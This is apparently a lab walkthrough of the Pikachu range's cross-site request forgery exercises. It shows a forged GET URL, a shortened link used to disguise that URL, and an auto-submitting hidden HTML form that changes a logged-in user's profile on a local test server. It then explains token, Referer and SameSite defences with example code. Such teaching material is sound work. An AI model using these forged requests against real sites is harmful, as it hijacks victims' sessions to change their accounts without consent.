Pikachu Range – Cross-Site Request Forgery (CSRF)

Article directory

  • 1. Cross-site request forgery (CSRF)
    • 1.1 CSRF(get)
    • 1.2 CSRF(post)
    • 1.3 CSRF Token
    • 1.4 CSRF vulnerability defense

1. Cross-site request forgery (CSRF)

You can also refer to my other article: Cross-site request forgery (CSRF)

CSRF stands for Cross-Site Request Forgery. It uses the victim's still-valid authentication information (cookies, session, etc.): the victim is tricked, without knowing it, into clicking a malicious link or visiting a page that contains attack code, and under those conditions a request is sent to the server in the victim's name (carrying the victim's authentication information) to complete an unauthorized operation (a transfer, a password change, and so on). The biggest difference between CSRF and XSS is that CSRF does not steal the cookie; it uses it directly.

What is CSRF?

CSRF, cross-site request forgery: typically the attacker forges a scenario (such as a link) to induce the user to click it. Once the user clicks, the attacker's goal is achieved: he can borrow your identity and send malicious requests on your behalf. The key to a CSRF attack is using the victim's cookie to send forged requests to the server.

1.1 CSRF(get)

Here is a login page; log in with the username and password shown in the prompt.


After logging in, we find a personal information page.


Click to modify the personal information, then click Submit.


At this point you can use Burp Suite to capture and modify the request: when you click Submit to modify the personal information, the request is captured and its content can be inspected.


The captured request URL shows that modifying user information involves no unpredictable authentication value, so we can simply change the parameters in the URL.

For example, change the phone number to a new value:

127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=Female&phonenum=150666666668&add=Beijing&email=[email protected]&submit=submit


But this URL is too obvious, so we can disguise it with a shortened URL.


https://s.r.sn.cn/vEARsG

If the user's login state (cookie/session) has not expired at that moment, the request succeeds. For instance, if a user logged in to Taobao opens a hacker-crafted link that changes the Taobao login password without first logging out of Taobao (that is, while the authentication information is still valid), the Taobao password will be changed.

1.2 CSRF(post)

Log in with the Allen account to make the changes.


Then use Burp Suite to capture and modify the request: when you click Submit to modify the personal information, the request is captured and its content can be inspected.


We find that the data is transmitted as a POST submission. We also know the tags and field names on this page, which can be used later when constructing the form.

An attacker can construct a malicious site, hide the POST request in a form on that site, and then trick the user into clicking. When the user clicks, the form is triggered and the data is POSTed to the website with the CSRF vulnerability, so the user's information is maliciously modified.

<html>
    <script>
        // This script submits the hidden form automatically once the page has loaded
        window.onload = function() {
            document.getElementById("submit").click();
        }
    </script>
    <body>
        <form action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
            <input type="hidden" name="sex" value="girl" />
            <input type="hidden" name="phonenum" value="15088888888" />
            <input type="hidden" name="add" value="Myanmar" />
            <input type="hidden" name="email" value="[email protected]" />
            <input type="hidden" name="submit" value="submit" />
            <!-- style="display:none" hides the submit button from the user -->
            <input id="submit" type="submit" value="Submit request" style="display:none" />
        </form>
    </body>
</html>


Deploy the finished form on the attacker's site. Because this is a local demonstration, it is placed in the WWW\pikachu\vur\scrf directory.


When a user visits the attacker's page 127.0.0.1/pikachu/vul/csrf/CSRF.html and the submit button is clicked (the script above does this automatically), his or her personal information is maliciously modified. The triggered POST request can be seen in the browser console after the click.


1.3 CSRF Token

Principle of token verification

The core problem of CSRF is that the links for sensitive operations are easy to forge. The fix is to add a random value (a token, which must be sufficiently random and hard to forge) to each request and have the back end verify it every time.

The page receives the token from the back end in a hidden form field and submits it back to the back end for verification. Each time the page is refreshed, the back end issues a different token, which prevents forgery.

Capture the request with Burp Suite and you can see that the packet contains a token.


Looking at the source code: when user information is modified, the server compares the token field in the URL with the token stored in the session, and only if they are identical is the user information modified. After the modification, the set_token() function generates a new token, which is returned to the HTML form as a hidden field so that it is included in the URL the next time the user modifies their information.


The set_token() function destroys the old token before generating a new one, so a token cannot be reused.
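A model of this token lifecycle, added here as an example (it is not Pikachu's own PHP: a dict stands in for $_SESSION, and the handler name, the profile values and the e-mail address are constructed for the demonstration):

```python
import hmac
import secrets

# A plain dict stands in for PHP's $_SESSION (assumption: one dict per logged-in user).

def set_token(session):
    """Destroy the old token and issue a fresh one, mirroring Pikachu's set_token()."""
    session.pop("token", None)                 # old value can no longer be replayed
    session["token"] = secrets.token_hex(16)   # 128 bits from the OS CSPRNG
    return session["token"]

def render_edit_form(session):
    """Embed the session token as a hidden input so the genuine form sends it back."""
    token = session.get("token") or set_token(session)
    return f'<input type="hidden" name="token" value="{token}" />'

def csrf_token_get_edit(session, params):
    """Model of the protected edit handler: request token must equal session token."""
    sent, expected = params.get("token"), session.get("token")
    # compare_digest keeps the comparison constant-time; a missing token fails closed
    if not sent or not expected or not hmac.compare_digest(sent, expected):
        return {"ok": False, "error": "csrf token error"}
    session["profile"] = {k: params[k] for k in ("sex", "phonenum", "add", "email")
                          if k in params}
    set_token(session)   # rotate after a successful change: each token is single-use
    return {"ok": True, "profile": session["profile"]}

def demo():
    """Walk the flow with constructed values; returns (forged, legit, replay, rotated)."""
    victim = {}
    render_edit_form(victim)                   # token issued when the page is rendered
    first = victim["token"]
    # a link forged without knowledge of the token (the 1.1 attack) is rejected
    forged = csrf_token_get_edit(victim, {"phonenum": "15066666668", "submit": "submit"})
    # the real form carries the hidden token and succeeds
    legit = csrf_token_get_edit(victim, {"sex": "boy", "phonenum": "15088888888",
                                         "add": "Beijing", "email": "allen@example.com",
                                         "token": first, "submit": "submit"})
    # replaying the already-used token after rotation also fails
    replay = csrf_token_get_edit(victim, {"phonenum": "15099999999", "token": first})
    return forged["ok"], legit["ok"], replay["ok"], victim["token"] != first

if __name__ == "__main__":
    print(demo())   # (False, True, False, True)
```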


1.4 CSRF vulnerability defense

  • Validate Referer field
  • Add Token verification
  • Two-step verification: require the password or a verification code before critical operations.
  • HttpOnly: a cookie attribute that, in some scenarios, prevents JS scripts from reading the cookie.
  • SameSite: a cookie attribute, a security mechanism provided by the browser itself.
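The Referer check and the cookie attributes from the list above, as an added example (not Pikachu's code; the site origin, the header values and the session id are constructed, and PHPSESSID is assumed to be the session cookie name):

```python
from urllib.parse import urlsplit

# Assumption: the application is served from this origin (constructed for the example).
SITE_ORIGIN = "http://127.0.0.1"

def _origin_tuple(url):
    """Reduce a URL to (scheme, host, port), default port filled in; None if unusable."""
    try:
        p = urlsplit(url)
        port = p.port                       # raises ValueError on a malformed port
    except ValueError:
        return None
    if p.scheme not in ("http", "https") or not p.hostname:
        return None                         # also covers a "null" Origin and garbage
    return (p.scheme, p.hostname.lower(), port or (443 if p.scheme == "https" else 80))

def request_allowed(headers, site_origin=SITE_ORIGIN):
    """Referer/Origin validation for a state-changing request.
    Origin is preferred (browsers send it on cross-site POSTs); Referer is the fallback.
    A missing header is rejected, because that is how a forged request may arrive."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    # full-origin comparison, not a prefix match: "127.0.0.1.attacker.example" must fail
    return _origin_tuple(source) == _origin_tuple(site_origin)

def session_cookie_header(session_id, samesite="Lax", secure=False):
    """Set-Cookie value for the PHP session cookie.
    HttpOnly keeps scripts away from it; SameSite stops the browser attaching it to
    cross-site requests such as the auto-submitted POST form above. Lax still sends it
    on top-level GET navigations (the shortened link in 1.1), so a GET must never change
    state; Strict blocks those navigations too."""
    attrs = [f"PHPSESSID={session_id}", "Path=/", "HttpOnly", f"SameSite={samesite}"]
    if secure:
        attrs.append("Secure")              # only ever send the cookie over https
    return "; ".join(attrs)

if __name__ == "__main__":
    checks = {
        "same-site form":   {"Referer": "http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get.php"},
        "prefix trick":     {"Referer": "http://127.0.0.1.attacker.example/csrf.html"},
        "origin overrides": {"Origin": "http://attacker.example", "Referer": "http://127.0.0.1/x"},
        "no header":        {},
    }
    for name, hdrs in checks.items():
        print(f"{name:18} allowed={request_allowed(hdrs)}")
    print(session_cookie_header("constructed-session-id", secure=True))
```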